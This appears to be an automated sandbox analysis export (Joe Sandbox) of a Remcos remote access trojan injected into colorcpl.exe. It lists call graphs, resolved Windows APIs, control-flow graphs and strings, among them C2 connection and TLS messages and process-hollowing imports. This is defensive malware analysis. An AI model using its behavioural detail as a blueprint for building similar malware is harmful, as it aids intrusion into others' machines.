94227->94256 94258 4661fd8 11 API calls 94227->94258 94260 4675a6e 94227->94260 94262 4675aac CreateThread 94227->94262 94263 4661f09 11 API calls 94227->94263 94735 4674f24 94227->94735 94740 466482d 94227->94740 94747 4664f51 94227->94747 94762 46648c8 connect 94227->94762 94822 467b871 94227->94822 94825 46745f8 94227->94825 94828 46a1ed1 94227->94828 94832 466ddc4 94227->94832 94838 467bcd3 94227->94838 94846 467bb77 94227->94846 94848 467bb27 94227->94848 94853 466f90c GetLocaleInfoA 94227->94853 94856 4662f31 94227->94856 94861 4664aa1 94227->94861 94876 4664c10 94227->94876 94895 4664e26 WaitForSingleObject 94227->94895 94910 46652fd 28 API calls 94227->94910 94230->94227 94231->94227 94233 4675b0a Sleep 94232->94233 94233->94227 94234->94227 94235->94227 94238->94227 94240->94227 94241->94227 94242->94227 94245->94227 94246->94227 94248 4675474 GetTickCount 94247->94248 94841 467bc1f 94248->94841 94254->94227 94255->94227 94256->94227 94258->94227 94911 466b08c 85 API calls 94260->94911 94262->94227 94988 467ada8 105 API calls 94262->94988 94263->94227 94264->93663 94265->93671 94266->93675 94269 46620df 11 API calls 94268->94269 94270 4666c65 94269->94270 94271 46632a0 28 API calls 94270->94271 94272 4666c82 94271->94272 94272->93696 94274 46735ae RegQueryValueExA RegCloseKey 94273->94274 94275 466ebdf 94273->94275 94274->94275 94275->93693 94275->93711 94276->93700 94277->93728 94278->93722 94279->93713 94280->93730 94989 4661f86 94281->94989 94284 466dae0 94287 467c048 GetCurrentProcess 94284->94287 94285 466daab 94993 467b645 29 API calls 94285->94993 94286 466dbd4 GetLongPathNameW 94289 466417e 28 API calls 94286->94289 94290 466dae5 94287->94290 94293 466dbe9 94289->94293 94294 466db3b 94290->94294 94295 466dae9 94290->94295 94291 466dab4 94292 4661f13 28 API calls 94291->94292 94296 466dabe 94292->94296 94298 466417e 28 API calls 94293->94298 94300 466417e 28 API calls 94294->94300 94299 466417e 28 API calls 94295->94299 94304 4661f09 11 API calls 
94296->94304 94297 466daa1 94297->94286 94301 466dbf8 94298->94301 94303 466daf7 94299->94303 94302 466db49 94300->94302 94996 466de0c 28 API calls 94301->94996 94309 466417e 28 API calls 94302->94309 94308 466417e 28 API calls 94303->94308 94304->94297 94306 466dc0b 94997 4662fa5 28 API calls 94306->94997 94310 466db0d 94308->94310 94312 466db5f 94309->94312 94994 4662fa5 28 API calls 94310->94994 94311 466dc16 94998 4662fa5 28 API calls 94311->94998 94995 4662fa5 28 API calls 94312->94995 94316 466db6a 94321 4661f13 28 API calls 94316->94321 94317 466db18 94320 4661f13 28 API calls 94317->94320 94318 466dc20 94319 4661f09 11 API calls 94318->94319 94322 466dc2a 94319->94322 94324 466db23 94320->94324 94323 466db75 94321->94323 94325 4661f09 11 API calls 94322->94325 94327 4661f09 11 API calls 94323->94327 94326 4661f09 11 API calls 94324->94326 94328 466dc33 94325->94328 94330 466db2c 94326->94330 94329 466db7e 94327->94329 94331 4661f09 11 API calls 94328->94331 94333 4661f09 11 API calls 94329->94333 94332 4661f09 11 API calls 94330->94332 94334 466dc3c 94331->94334 94332->94296 94333->94296 94335 4661f09 11 API calls 94334->94335 94336 466dc45 94335->94336 94337 4661f09 11 API calls 94336->94337 94338 466dc4e 94337->94338 94338->93787 94339->93799 94340->93821 94342 4673759 RegQueryValueExA RegCloseKey 94341->94342 94343 467377d 94341->94343 94342->94343 94343->93780 94344->93813 94345->93849 94346->93859 94347->93883 94348->93870 94350->93915 94351->93720 94354 467b556 LoadResource LockResource SizeofResource 94353->94354 94355 466f419 94353->94355 94354->94355 94356 469bda0 94355->94356 94361 46a61b8 ___crtLCMapStringA 94356->94361 94357 46a61f6 94373 46a062d 20 API calls __dosmaperr 94357->94373 94358 46a61e1 RtlAllocateHeap 94360 46a61f4 94358->94360 94358->94361 94360->93957 94361->94357 94361->94358 94372 46a3001 7 API calls 2 library calls 94361->94372 94364 46620bf 94363->94364 94374 46623ce 94364->94374 94366 46620ca 94378 466250a 94366->94378 94368 
46620d9 94368->93960 94370 46620b7 28 API calls 94369->94370 94371 4666e27 94370->94371 94371->93967 94372->94361 94373->94360 94375 4662428 94374->94375 94376 46623d8 94374->94376 94375->94366 94376->94375 94385 46627a7 11 API calls std::_Deallocate 94376->94385 94379 466251a 94378->94379 94380 4662535 94379->94380 94381 4662520 94379->94381 94396 46628e8 94380->94396 94386 4662569 94381->94386 94384 4662533 94384->94368 94385->94375 94407 4662888 94386->94407 94388 466257d 94389 46625a7 94388->94389 94390 4662592 94388->94390 94392 46628e8 28 API calls 94389->94392 94412 4662a34 22 API calls 94390->94412 94395 46625a5 94392->94395 94393 466259b 94413 46629da 22 API calls 94393->94413 94395->94384 94397 46628f1 94396->94397 94398 4662953 94397->94398 94399 46628fb 94397->94399 94416 46628a4 22 API calls 94398->94416 94402 4662904 94399->94402 94403 4662917 94399->94403 94415 4662cae 28 API calls __EH_prolog 94402->94415 94405 4662915 94403->94405 94406 46623ce 11 API calls 94403->94406 94405->94384 94406->94405 94408 4662890 94407->94408 94409 4662898 94408->94409 94414 4662ca3 22 API calls 94408->94414 94409->94388 94412->94393 94413->94395 94415->94405 94418 46620e7 94417->94418 94419 46623ce 11 API calls 94418->94419 94420 46620f2 94419->94420 94420->93979 94421->93979 94422->93979 94423->93985 94424->93995 94425->93997 94426->94004 94427->94001 94430 46632aa 94429->94430 94431 46628e8 28 API calls 94430->94431 94432 46632c9 94430->94432 94431->94432 94432->94015 94434 46651fb 94433->94434 94443 4665274 94434->94443 94436 4665208 94436->94018 94438 4662061 94437->94438 94439 46623ce 11 API calls 94438->94439 94440 466207b 94439->94440 94448 466267a 94440->94448 94444 4665282 94443->94444 94447 46628a4 22 API calls 94444->94447 94449 466268b 94448->94449 94450 46623ce 11 API calls 94449->94450 94451 466208d 94450->94451 94451->94021 94452->94029 94453->94034 94455 4662246 94454->94455 94455->94039 94457 467c055 GetCurrentProcess 94456->94457 94458 467b362 

                                                                            Control-flow Graph

                                                                            APIs
                                                                              • Part of subcall function 04673584: RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,?), ref: 046735A4
                                                                              • Part of subcall function 04673584: RegQueryValueExA.KERNEL32(?,?,00000000,00000000,00000000,?,046D52F0), ref: 046735C2
                                                                              • Part of subcall function 04673584: RegCloseKey.KERNEL32(?), ref: 046735CD
                                                                            • Sleep.KERNEL32(00000BB8), ref: 0466F896
                                                                            • ExitProcess.KERNEL32 ref: 0466F905
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000008.00000002.4116150269.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_8_2_4660000_colorcpl.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CloseExitOpenProcessQuerySleepValue
                                                                            • String ID: 5.1.2 Pro$override$pth_unenc
                                                                            • API String ID: 2281282204-3554326054
                                                                            • Opcode ID: e62e64fd6673a460c8284ee11d5865838b42899646dae278e518b1e6eea6017d
                                                                            • Instruction ID: 57b9c007d36c3479670f04638d45cc38660d97062e50eabab91259e7daa73d17
                                                                            • Opcode Fuzzy Hash: e62e64fd6673a460c8284ee11d5865838b42899646dae278e518b1e6eea6017d
                                                                            • Instruction Fuzzy Hash: A621C161F1030067F6087B79986A9BE39AAABD1619F40441CE80B57384FE35BD058BEA

                                                                            Control-flow Graph

                                                                            APIs
                                                                            • VirtualAlloc.KERNEL32(?,?,00003000,00000040,?,?,?,?,00000000,?,?,?,00000000), ref: 0670127E
                                                                            • VirtualAlloc.KERNEL32(00000000,?,00001000,00000040,?,?,00000000,?,?,?,00000000,?,?,?,00007463), ref: 0670128E
                                                                            • LoadLibraryA.KERNEL32(?,?,?,00000000,?,?,?,00000000,?,?,?,00007463,?,?,?,00000000), ref: 067013D5
                                                                            Memory Dump Source
                                                                            • Source File: 00000008.00000002.4116392434.0000000006700000.00000040.00000400.00020000.00000000.sdmp, Offset: 06700000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_8_2_6700000_colorcpl.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: AllocVirtual$LibraryLoad
                                                                            • String ID:
                                                                            • API String ID: 2441068224-0
                                                                            • Opcode ID: c48d9d0de19bfb502c6818de9c29b524ab755fb6d98b0271e3d11d7ca3555044
                                                                            • Instruction ID: a72cb98d21b63a64fd96cdcd6ca29f3ae2c9b08ae85601c43f0237e6c787a75e
                                                                            • Opcode Fuzzy Hash: c48d9d0de19bfb502c6818de9c29b524ab755fb6d98b0271e3d11d7ca3555044
                                                                            • Instruction Fuzzy Hash: 94D1B172E00205EFEB64CFA9CC84BA9B7F5FF84314F548169E815AB695D770E901CBA0
                                                                            APIs
                                                                            • GetUserNameW.ADVAPI32(?,0466F25E), ref: 0467B6D3
                                                                            Memory Dump Source
                                                                            • Source File: 00000008.00000002.4116150269.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_8_2_4660000_colorcpl.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: NameUser
                                                                            • String ID:
                                                                            • API String ID: 2645101109-0
                                                                            • Opcode ID: d90d30d64c1468cf157f2b66ea7e5e7b2de1e32a84fd1c1e91c96d2d7557c90f
                                                                            • Instruction ID: d56f4aeb0d8b5ceaf6a7ff5726c9b16ef67b709fe02c74ea28edd8155950ea17
                                                                            • Opcode Fuzzy Hash: d90d30d64c1468cf157f2b66ea7e5e7b2de1e32a84fd1c1e91c96d2d7557c90f
                                                                            • Instruction Fuzzy Hash: C601FF7190011CABDB04EBD4DC54AEDB7BCEF44309F10015AA506A2150FE746E89CB98

                                                                            Control-flow Graph

                                                                            APIs
                                                                              • Part of subcall function 0467CBE1: LoadLibraryA.KERNEL32(Psapi,GetProcessImageFileNameW,?,?,?,?,0466EA1C), ref: 0467CBF6
                                                                              • Part of subcall function 0467CBE1: GetProcAddress.KERNEL32(00000000), ref: 0467CBFF
                                                                              • Part of subcall function 0467CBE1: GetModuleHandleA.KERNEL32(Kernel32,GetProcessImageFileNameW,?,?,?,?,0466EA1C), ref: 0467CC16
                                                                              • Part of subcall function 0467CBE1: GetProcAddress.KERNEL32(00000000), ref: 0467CC19
                                                                              • Part of subcall function 0467CBE1: LoadLibraryA.KERNEL32(shcore,SetProcessDpiAwareness,?,?,?,?,0466EA1C), ref: 0467CC2B
                                                                              • Part of subcall function 0467CBE1: GetProcAddress.KERNEL32(00000000), ref: 0467CC2E
                                                                              • Part of subcall function 0467CBE1: LoadLibraryA.KERNEL32(user32,SetProcessDpiAwareness,?,?,?,?,0466EA1C), ref: 0467CC3F
                                                                              • Part of subcall function 0467CBE1: GetProcAddress.KERNEL32(00000000), ref: 0467CC42
                                                                              • Part of subcall function 0467CBE1: LoadLibraryA.KERNEL32(ntdll,NtUnmapViewOfSection,?,?,?,?,0466EA1C), ref: 0467CC54
                                                                              • Part of subcall function 0467CBE1: GetProcAddress.KERNEL32(00000000), ref: 0467CC57
                                                                              • Part of subcall function 0467CBE1: LoadLibraryA.KERNEL32(kernel32,GlobalMemoryStatusEx,?,?,?,?,0466EA1C), ref: 0467CC63
                                                                              • Part of subcall function 0467CBE1: GetProcAddress.KERNEL32(00000000), ref: 0467CC66
                                                                              • Part of subcall function 0467CBE1: GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,?,0466EA1C), ref: 0467CC77
                                                                              • Part of subcall function 0467CBE1: GetProcAddress.KERNEL32(00000000), ref: 0467CC7A
                                                                              • Part of subcall function 0467CBE1: GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW,?,?,?,?,0466EA1C), ref: 0467CC8B
                                                                              • Part of subcall function 0467CBE1: GetProcAddress.KERNEL32(00000000), ref: 0467CC8E
                                                                              • Part of subcall function 0467CBE1: LoadLibraryA.KERNEL32(Shell32,IsUserAnAdmin,?,?,?,?,0466EA1C), ref: 0467CC9F
                                                                              • Part of subcall function 0467CBE1: GetProcAddress.KERNEL32(00000000), ref: 0467CCA2
                                                                              • Part of subcall function 0467CBE1: GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?,?,?,0466EA1C), ref: 0467CCB3
                                                                              • Part of subcall function 0467CBE1: GetProcAddress.KERNEL32(00000000), ref: 0467CCB6
                                                                              • Part of subcall function 0467CBE1: GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW,?,?,?,?,0466EA1C), ref: 0467CCC7
                                                                              • Part of subcall function 0467CBE1: GetProcAddress.KERNEL32(00000000), ref: 0467CCCA
                                                                              • Part of subcall function 0467CBE1: GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors,?,?,?,?,0466EA1C), ref: 0467CCDB
                                                                              • Part of subcall function 0467CBE1: GetProcAddress.KERNEL32(00000000), ref: 0467CCDE
                                                                              • Part of subcall function 0467CBE1: GetModuleHandleA.KERNEL32(user32,GetMonitorInfoW,?,?,?,?,0466EA1C), ref: 0467CCEF
                                                                              • Part of subcall function 0467CBE1: GetProcAddress.KERNEL32(00000000), ref: 0467CCF2
                                                                              • Part of subcall function 0467CBE1: GetModuleHandleA.KERNEL32(kernel32,GetSystemTimes,?,?,?,?,0466EA1C), ref: 0467CD03
                                                                              • Part of subcall function 0467CBE1: GetProcAddress.KERNEL32(00000000), ref: 0467CD06
                                                                              • Part of subcall function 0467CBE1: LoadLibraryA.KERNEL32(Shlwapi,0000000C,?,?,?,?,0466EA1C), ref: 0467CD14
                                                                            • GetModuleFileNameW.KERNEL32(00000000,C:\Windows\SysWOW64\colorcpl.exe,00000104), ref: 0466EA29
                                                                              • Part of subcall function 04670F72: __EH_prolog.LIBCMT ref: 04670F77
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000008.00000002.4116150269.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_8_2_4660000_colorcpl.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: AddressProc$Module$Handle$LibraryLoad$FileH_prologName
                                                                            • String ID: Access Level: $Administrator$C:\Windows\SysWOW64\colorcpl.exe$Exe$Inj$Remcos Agent initialized$Software\$User$del$del$exepath$licence$license_code.txt
                                                                            • API String ID: 2830904901-2432426600
                                                                            • Opcode ID: 9e73d01a397d0ca31ea812f80f37e70608064ef6f0a13ce6013014b653ff4a5a
                                                                            • Instruction ID: d9ff29b2d4ea7716f3e5ab8bb5b915e8db3978b79283fb79effb5a6c4f0d6728
                                                                            • Opcode Fuzzy Hash: 9e73d01a397d0ca31ea812f80f37e70608064ef6f0a13ce6013014b653ff4a5a
                                                                            • Instruction Fuzzy Hash: A332E460F043446BFB18BB74DC65ABE26D99F8264CF40082DE5439B2C1FE69FD0587A9

                                                                            Control-flow Graph

                                                                            control_flow_graph 448 4674f65-4674fad call 46620df call 467b944 call 46620df call 4661e65 call 4661fab call 469bb2c 461 4674faf-4674fb6 Sleep 448->461 462 4674fbc-4675008 call 4662093 call 4661e65 call 46620f6 call 467beac call 466489e call 4661e65 call 466b9f8 448->462 461->462 477 467507c-4675117 call 4662093 call 4661e65 call 46620f6 call 467beac call 4661e65 * 2 call 4666c59 call 4662f10 call 4661fe2 call 4661fd8 * 2 call 4661e65 call 4665b05 462->477 478 467500a-4675079 call 4661e65 call 466247c call 4661e65 call 4661fab call 4661e65 call 466247c call 4661e65 call 4661fab call 4661e65 call 466247c call 4661e65 call 4661fab call 466473d 462->478 531 4675127-467512e 477->531 532 4675119-4675125 477->532 478->477 533 4675133-46751c5 call 4665aa6 call 466531e call 4666383 call 4662f10 call 4662093 call 467b580 call 4661fd8 * 2 call 4661e65 call 4661fab call 4661e65 call 4661fab call 4674f24 531->533 532->533 560 46751c7-467520b WSAGetLastError call 467cb72 call 46652fd call 4662093 call 467b580 call 4661fd8 533->560 561 4675210-467521e call 466482d 533->561 584 4675ade-4675af0 call 4664e26 call 46621fa 560->584 567 4675220-4675246 call 4662093 * 2 call 467b580 561->567 568 467524b-4675260 call 4664f51 call 46648c8 561->568 567->584 583 4675266-46753b9 call 4661e65 * 2 call 466531e call 4666383 call 4662f10 call 4666383 call 4662f10 call 4662093 call 467b580 call 4661fd8 * 4 call 467b871 call 46745f8 call 4669097 call 46a1ed1 call 4661e65 call 46620f6 call 466247c call 4661fab * 2 call 4673733 568->583 568->584 648 46753cd-46753f4 call 4661fab call 46735e1 583->648 649 46753bb-46753c8 call 4665aa6 583->649 596 4675af2-4675b12 call 4661e65 call 4661fab call 469bb2c Sleep 584->596 597 4675b18-4675b20 call 4661e8d 584->597 596->597 597->477 655 46753f6-46753f8 648->655 656 46753fb-4675a45 call 466417e call 466ddc4 call 467bcd3 call 467bdaf call 467bc1f call 4661e65 GetTickCount call 467bc1f call 467bb77 call 467bc1f * 2 call 467bb27 call 467bdaf * 5 call 466f90c call 467bdaf call 4662f31 call 4662ea1 call 4662f10 call 4662ea1 call 4662f10 * 3 call 4662ea1 call 4662f10 call 4666383 call 4662f10 call 4666383 call 4662f10 call 4662ea1 call 4662f10 call 4662ea1 call 4662f10 call 4662ea1 call 4662f10 call 4662ea1 call 4662f10 call 4662ea1 call 4662f10 call 4662ea1 call 4662f10 call 4662ea1 call 4662f10 call 4666383 call 4662f10 * 5 call 4662ea1 call 4662f10 call 4662ea1 call 4662f10 * 7 call 4662ea1 call 4664aa1 call 4661fd8 * 50 call 4661f09 call 4661fd8 * 6 call 4661f09 call 4664c10 648->656 649->648 655->656 901 4675a4a-4675a51 656->901 902 4675a65-4675a6c 901->902 903 4675a53-4675a5a 901->903 905 4675a6e-4675a73 call 466b08c 902->905 906 4675a78-4675aaa call 4665a6b call 4662093 * 2 call 467b580 902->906 903->902 904 4675a5c-4675a5e 903->904 904->902 905->906 917 4675abe-4675ad9 call 4661fd8 * 2 call 4661f09 906->917 918 4675aac-4675ab8 CreateThread 906->918 917->584 918->917
                                                                            APIs
                                                                            • Sleep.KERNEL32(00000000,00000029,046D52F0,046D50E4,00000000), ref: 04674FB6
                                                                            • WSAGetLastError.WS2_32(00000000,00000001), ref: 046751C7
                                                                            • Sleep.KERNEL32(00000000,00000002), ref: 04675B12
                                                                              • Part of subcall function 0467B580: GetLocalTime.KERNEL32(00000000), ref: 0467B59A
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000008.00000002.4116150269.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_8_2_4660000_colorcpl.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Sleep$ErrorLastLocalTime
                                                                            • String ID: | $%I64u$5.1.2 Pro$C:\Windows\SysWOW64\colorcpl.exe$Connected | $Connecting | $Connection Error: $Connection Error: Unable to create socket$Disconnected$TLS Off$TLS On $hlight$name
                                                                            • API String ID: 524882891-3072554048
                                                                            • Opcode ID: 28ca322d3547a885e91361e286d091fbbe424122b7a90e34c6589f307e2179da
                                                                            • Instruction ID: 88b11cb1ea0263f02bb99143a7ae78968a0fb0bb8f9f7671d1c4e708fdd4ed58
                                                                            • Opcode Fuzzy Hash: 28ca322d3547a885e91361e286d091fbbe424122b7a90e34c6589f307e2179da
                                                                            • Instruction Fuzzy Hash: D5523771E001189BEB18FB31ECA5AFEB3A59F55208F5045EDD40BA6194FF307E868E58

                                                                            APIs
                                                                            • connect.WS2_32(?,?,?), ref: 046648E0
                                                                            • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000), ref: 04664A00
                                                                            • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000), ref: 04664A0E
                                                                            • WSAGetLastError.WS2_32 ref: 04664A21
                                                                              • Part of subcall function 0467B580: GetLocalTime.KERNEL32(00000000), ref: 0467B59A
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000008.00000002.4116150269.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_8_2_4660000_colorcpl.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CreateEvent$ErrorLastLocalTimeconnect
                                                                            • String ID: Connection Failed: $Connection Refused$TLS Authentication Failed$TLS Error 1$TLS Error 2$TLS Error 3$TLS Handshake... |
                                                                            • API String ID: 994465650-2151626615
                                                                            • Opcode ID: 41f88e7b50046dc2c9e29df0cb5d0fcc6506e4aa925e995c62f60c80ee56535b
                                                                            • Instruction ID: 9267dc02325776818435ef4cf193accfdece1f59e8f55d7c587a54da89f62917
                                                                            • Opcode Fuzzy Hash: 41f88e7b50046dc2c9e29df0cb5d0fcc6506e4aa925e995c62f60c80ee56535b
                                                                            • Instruction Fuzzy Hash: 3B41E665B502067BFB18BB79CD5A47DBB55EB5120CB40026CD80347A85FE62BC248FEB

                                                                            APIs
                                                                            • WaitForSingleObject.KERNEL32(?,000000FF,00000000,046D4EF8,?,00000000,046D4EF8,04664CA8,00000000,?,?,00000000,046D4EF8,04664AC9), ref: 04664E38
                                                                            • SetEvent.KERNEL32(?,?,00000000,046D4EF8,04664CA8,00000000,?,?,00000000,046D4EF8,04664AC9), ref: 04664E43
                                                                            • CloseHandle.KERNEL32(?,?,00000000,046D4EF8,04664CA8,00000000,?,?,00000000,046D4EF8,04664AC9), ref: 04664E4C
                                                                            • closesocket.WS2_32(?), ref: 04664E5A
                                                                            • WaitForSingleObject.KERNEL32(?,000000FF,?,00000000,046D4EF8,04664CA8,00000000,?,?,00000000,046D4EF8,04664AC9), ref: 04664E91
                                                                            • SetEvent.KERNEL32(?,?,00000000,046D4EF8,04664CA8,00000000,?,?,00000000,046D4EF8,04664AC9), ref: 04664EA2
                                                                            • WaitForSingleObject.KERNEL32(?,000000FF,?,00000000,046D4EF8,04664CA8,00000000,?,?,00000000,046D4EF8,04664AC9), ref: 04664EA9
                                                                            • SetEvent.KERNEL32(?,?,00000000,046D4EF8,04664CA8,00000000,?,?,00000000,046D4EF8,04664AC9), ref: 04664EBA
                                                                            • CloseHandle.KERNEL32(?,?,00000000,046D4EF8,04664CA8,00000000,?,?,00000000,046D4EF8,04664AC9), ref: 04664EBF
                                                                            • CloseHandle.KERNEL32(?,?,00000000,046D4EF8,04664CA8,00000000,?,?,00000000,046D4EF8,04664AC9), ref: 04664EC4
                                                                            • SetEvent.KERNEL32(?,?,00000000,046D4EF8,04664CA8,00000000,?,?,00000000,046D4EF8,04664AC9), ref: 04664ED1
                                                                            • CloseHandle.KERNEL32(?,?,00000000,046D4EF8,04664CA8,00000000,?,?,00000000,046D4EF8,04664AC9), ref: 04664ED6
                                                                            Memory Dump Source
                                                                            • Source File: 00000008.00000002.4116150269.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_8_2_4660000_colorcpl.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CloseEventHandle$ObjectSingleWait$closesocket
                                                                            • String ID:
                                                                            • API String ID: 3658366068-0
                                                                            • Opcode ID: 4e6d13b248690acabcd84951799c4fbd9f22ccb760e0d19f77dabb7aa65689f2
                                                                            • Instruction ID: e7ad0b7971a93525f141c3ff17f527f6890d0abee398aacdbe8c885ff74d4bef
                                                                            • Opcode Fuzzy Hash: 4e6d13b248690acabcd84951799c4fbd9f22ccb760e0d19f77dabb7aa65689f2
                                                                            • Instruction Fuzzy Hash: 93213B31550B00AFDB316B25DC49B16BBA1FF4132AF114A1DE2E301AF0EB75B855DB98

                                                                            APIs
                                                                            • GetLongPathNameW.KERNEL32(00000000,?,00000208), ref: 0466DBD5
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000008.00000002.4116150269.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_8_2_4660000_colorcpl.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: LongNamePath
                                                                            • String ID: AppData$ProgramData$ProgramFiles$SystemDrive$Temp$UserProfile$WinDir$\SysWOW64$\system32
                                                                            • API String ID: 82841172-425784914
                                                                            • Opcode ID: e1613319dfcc8bd3047b949e24107120e9448a74bed2bb74c887a11a9b4036ca
                                                                            • Instruction ID: f943d9af28523ef430da49ab34f1c3fef67c4e0a25a1eae88c90027188052134
                                                                            • Opcode Fuzzy Hash: e1613319dfcc8bd3047b949e24107120e9448a74bed2bb74c887a11a9b4036ca
                                                                            • Instruction Fuzzy Hash: 094111712082059BE304FA64DC65CFEB7E8EFA165AF10051DB547920A0FF74BE49CA9A

                                                                            control_flow_graph 1099 467b354-467b3ab call 467c048 call 46735e1 call 4661fe2 call 4661fd8 call 4666b1c 1110 467b3ee-467b3f7 1099->1110 1111 467b3ad-467b3bc call 46735e1 1099->1111 1112 467b400 1110->1112 1113 467b3f9-467b3fe 1110->1113 1116 467b3c1-467b3d8 call 4661fab StrToIntA 1111->1116 1115 467b405-467b410 call 466537d 1112->1115 1113->1115 1121 467b3e6-467b3e9 call 4661fd8 1116->1121 1122 467b3da-467b3e3 call 467cffa 1116->1122 1121->1110 1122->1121
                                                                            APIs
                                                                              • Part of subcall function 0467C048: GetCurrentProcess.KERNEL32(?,?,?,0466DAE5,WinDir,00000000,00000000), ref: 0467C059
                                                                              • Part of subcall function 046735E1: RegOpenKeyExA.KERNEL32(80000001,00000400,00000000,00020019,?), ref: 04673605
                                                                              • Part of subcall function 046735E1: RegQueryValueExA.KERNEL32(?,?,00000000,00000000,?,00000400), ref: 04673622
                                                                              • Part of subcall function 046735E1: RegCloseKey.KERNEL32(?), ref: 0467362D
                                                                            • StrToIntA.SHLWAPI(00000000,046CCA08,00000000,00000000,00000000,046D50E4,00000003,Exe,00000000,0000000E,00000000,046C60CC,00000003,00000000), ref: 0467B3CD
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000008.00000002.4116150269.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_8_2_4660000_colorcpl.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CloseCurrentOpenProcessQueryValue
                                                                            • String ID: (32 bit)$ (64 bit)$CurrentBuildNumber$ProductName$SOFTWARE\Microsoft\Windows NT\CurrentVersion
                                                                            • API String ID: 1866151309-2070987746
                                                                            • Opcode ID: 6a61716b2643a0f15f7e432451412f8cb8446661dff3317f341ba4772175fb88
                                                                            • Instruction ID: 1e6b37cf37eeedeba23c95f69432bcb12d1dbdd317358d8dbda0dfd91e3de931
                                                                            • Opcode Fuzzy Hash: 6a61716b2643a0f15f7e432451412f8cb8446661dff3317f341ba4772175fb88
                                                                            • Instruction Fuzzy Hash: 9C118860E412456BF704B368CC8EEBF7759CBA1618F84012CE407A32C0FA647D4687E9

                                                                            Control-flow Graph

                                                                            control_flow_graph 1173 46af3da-46af3ef GetEnvironmentStringsW 1174 46af3f1-46af411 call 46af3a3 WideCharToMultiByte 1173->1174 1175 46af447 1173->1175 1174->1175 1181 46af413-46af414 call 46a61b8 1174->1181 1176 46af449-46af44b 1175->1176 1178 46af44d-46af44e FreeEnvironmentStringsW 1176->1178 1179 46af454-46af45c 1176->1179 1178->1179 1183 46af419-46af41e 1181->1183 1184 46af43c 1183->1184 1185 46af420-46af434 WideCharToMultiByte 1183->1185 1187 46af43e-46af445 call 46a6802 1184->1187 1185->1184 1186 46af436-46af43a 1185->1186 1186->1187 1187->1176
                                                                            APIs
                                                                            • GetEnvironmentStringsW.KERNEL32 ref: 046AF3E3
                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 046AF406
                                                                              • Part of subcall function 046A61B8: RtlAllocateHeap.NTDLL(00000000,04695349,?,?,046988C7,?,?,pth_unenc,?,?,0466DE9D,04695349,?,?,?,?), ref: 046A61EA
                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 046AF42C
                                                                            • _free.LIBCMT ref: 046AF43F
                                                                            • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 046AF44E
                                                                            Memory Dump Source
                                                                            • Source File: 00000008.00000002.4116150269.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_8_2_4660000_colorcpl.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                                            • String ID:
                                                                            • API String ID: 336800556-0
                                                                            • Opcode ID: 3cebab70261c6fa6b21ca44f928ff565382c4f19bc5b9f0e82d88f3423f3d02a
                                                                            • Instruction ID: b8c066639374da876f15a699087c29bee730693c7728f6e59c324b70e4ecea5c
                                                                            • Opcode Fuzzy Hash: 3cebab70261c6fa6b21ca44f928ff565382c4f19bc5b9f0e82d88f3423f3d02a
                                                                            • Instruction Fuzzy Hash: 7B01FCB2601B117F27255AB65C4CC7B7A6CDFC6FA5354012DFE04D2301FA649C1299F2

                                                                            Control-flow Graph

